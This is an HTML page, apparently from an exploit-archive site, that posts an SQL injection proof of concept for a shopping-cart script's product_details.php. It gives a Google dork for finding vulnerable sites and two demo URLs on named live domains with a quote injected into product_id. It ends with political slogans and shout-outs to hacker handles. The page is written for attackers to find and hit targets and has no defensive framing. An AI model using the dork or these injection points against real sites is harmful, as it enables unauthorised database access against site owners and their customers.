<html>
    <head>
        <link rel="shortcut icon" href="https://mr-msa.xyz/IMG/icon.png" type="image/x-icon">
        <style>
            html
            {
                background-color:black;
            }
            pre
            {
                color:green;
                font-size:11pt;
            }
            a
            {
                text-decoration:none;
            }
            button
            {
                background-color:green;
                width:200px;
                height:40px;
                color:#FFF;
                border:1px solid #999;
                border-radius:4px;
                
            }
            .back
            {
                width:60px;
            }
        </style>
        <title>exploit-3</title>
    </head>
    <body>
        <center>
                <a  href="exploit-3" download>
                    <button>
                    Download
                    </button>
                </a>
                <a href="../database">
                    <button class="back">
                    Back
                    </button>
                </a>
        </center>
        <pre>
############################################
# Title : Web Design db/CART/product_details www.fakihonline.com Sql injection Vulnerability
# Author : Guardiran Security Team
# category : webapps
# Tested On : Win 8 , Kali Linux
# my team:guardiran.org/profile/25294-rednofozi/ 
# me : Rednofozi@yahoo.com
# Vendor HomePage : http://www.fakihonline.com
# Google Dork: db/CART/product_details.php?product_id=
############################################

# search google Dork : db/CART/product_details.php?product_id=

####################Proof of Concept #############



#Demo :
http://www.fakihonline.com/product_details.php?product_id=7' [Sql injection Vulnerability]
http://kristineriis.com/product_details.php?product_id=492'[Sql injection Vulnerability]
# Discovered by : Rednofozi


#Long live SistanAs long as I live in my body, I defend this soilLong live Seyyed Ali Khamenei


#--tnx to :REX , DeMoN, C0d3!Nj3ct!0n ,Mr.Python , virtual_hate Comrade?, JOK3R ,  Ruiner , mr_null -  1TED
        </pre>
    </body>
</html>